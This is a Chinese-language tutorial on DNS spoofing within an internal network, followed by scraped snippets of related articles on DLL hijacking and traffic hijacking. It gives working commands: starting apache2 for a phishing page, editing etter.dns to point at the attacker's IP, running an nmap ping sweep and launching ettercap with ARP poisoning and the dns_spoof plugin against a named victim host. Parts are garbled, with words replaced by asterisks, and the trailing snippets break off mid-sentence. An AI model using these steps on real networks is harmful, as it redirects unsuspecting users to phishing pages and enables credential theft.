內網滲透之dns劫持

2021-10-07 16:13:31 字數 851 閱讀 6897

dns欺騙,被攻擊的主機訪問任意**的回被轉到特定的釣魚**,

實驗工具:

kali linux 黑客機

win10 肉雞

apache2

ettercap

操作步驟

1,開啟kali上的apache2服務,

@kali:~# service apache2 start

root@kali:~# service apache2 status

綠點就是已經開啟了。

2,製作網頁,釣魚網頁不回做,就隨便做了乙個,命令如下

3,修改ettercap dns檔案;

ot@kali:~# vim /etc/ettercap/etter.dns

a 192.168.1.112 (黑客機ip位址)

4,尋找目標ip

kali:~# nmap -sp 192.168.1.1-255

5,發起欺騙

kali:~# ettercap -i eth0 -t -p dns_spoof -m arp /192.168.1.132///

ip位址是被攻擊的主機,

6,被攻擊的主機訪問任意**的回被劫持,

從內網滲透來理解dll劫持的工具

dll劫持 以前學過 但是並沒有注意過 但是這一天在web手的啟發下 發現 dll劫持在內網滲透裡面的許可權維持使用率還是挺高的,看來不能小看老技術啊 一開始我的想法是 修改exe 然後直接替換exe dll 查詢的順序就不說了 這裡就了解到三個工具 以及他們的思路 發現學習了不少 第乙個是 rat...

DNS劫持 流量劫持,HTTP HTTPS劫持

dns劫持 dns劫持就是通過劫持了dns伺服器,通過某些手段取得某網域名稱的解析記錄控制權,進而修改此網域名稱的解析結果,導致對該網域名稱的訪問由原ip位址轉入到修改後的指定ip,其結果就是對特定的 不能訪問或訪問的是假 從而實現竊取資料或者破壞原有正常服務的目的。dns劫持通過篡改dns伺服器上...

內網滲透 內網滲透測試基礎 1

內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...